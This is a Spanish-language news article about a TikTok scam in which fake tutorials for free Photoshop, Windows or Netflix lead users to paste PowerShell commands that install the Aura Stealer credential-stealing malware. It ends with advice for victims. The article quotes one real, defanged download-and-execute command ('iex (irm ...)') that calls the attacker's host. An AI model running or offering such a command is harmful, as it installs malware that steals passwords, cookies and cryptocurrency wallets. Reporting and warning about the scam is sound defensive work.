Agencias
Una nueva estafa en TikTok pone en riesgo la seguridad digital y los datos personales de miles de usuarios. Los ciberdelincuentes usan tutoriales falsos para engañar y robar información. Pero ¿cómo opera este tipo de fraude?
A través de falsos tutoriales que prometen acceso gratuito a servicios como Windows, Netflix o Photoshop, los ciberdelincuentes están distribuyendo malware y robando datos personales mediante comandos que parecen inofensivos.
¿Cómo funciona esta estafa en TikTok?
El fraude se basa en una técnica de ingeniería social conocida como ClickFix, que consiste en ofrecer soluciones aparentemente sencillas a problemas técnicos comunes.
Los videos, disfrazados de consejos prácticos, instruyen a los usuarios a ejecutar comandos en PowerShell, la terminal del sistema operativo Windows.
Uno de los ejemplos más compartidos muestra cómo supuestamente activar Photoshop gratis mediante un comando como: iex (irm slmgr[.]win/photoshop).
Este código, lejos de cumplir su promesa, conecta el dispositivo del usuario con un servidor remoto desde donde se descargan y ejecutan scripts maliciosos.
Según el análisis de Xavier Mertens, investigador del SANS Internet Storm Center (ISC), los comandos permiten la instalación de dos archivos ejecutables con funcionalidades nocivas.
¿Qué tipo de malware se instala?
De acuerdo con el portal Bleeping Computer, el primer archivo ejecutable es una variante del conocido Aura Stealer, un software malicioso especializado en el robo de:
Contraseñas almacenadas en navegadores
Cookies de autenticación
Información de acceso a billeteras de criptomonedas
El segundo archivo ejecutable tiene la capacidad de compilar código de forma dinámica, lo que podría permitir a los atacantes adaptar el ataque en función del dispositivo o el perfil de la víctima.
Aún no se ha determinado su propósito exacto, pero los expertos no descartan que pueda ser utilizado para escalar el ataque o mantener persistencia en el sistema afectado.
¿Qué hacer si ejecutaste uno de estos comandos?
Si caíste en esta estafa y seguiste los comandos de los videos de TikTok, los expertos recomiendan actuar de inmediato para proteger tu información. Entre las medidas clave se encuentran:
Cambiar todas las contraseñas de servicios en línea, incluyendo correo electrónico, redes sociales, cuentas bancarias y plataformas de streaming.
Ejecutar un análisis completo del sistema con software antivirus actualizado.
Desconectar el dispositivo de redes sensibles en caso de detectar actividad inusual o sospechosa.
Verificar configuraciones del sistema para detectar servicios extraños o procesos desconocidos ejecutándose en segundo plano.
Además, es recomendable reportar los videos y cuentas responsables directamente a TikTok para facilitar su eliminación y reducir el alcance del ataque.
“El contenido en TikTok genera confianza por su formato directo. Muchos usuarios asumen que si algo funciona en un video popular, debe ser legítimo”, advirtió Mertens desde el ISC.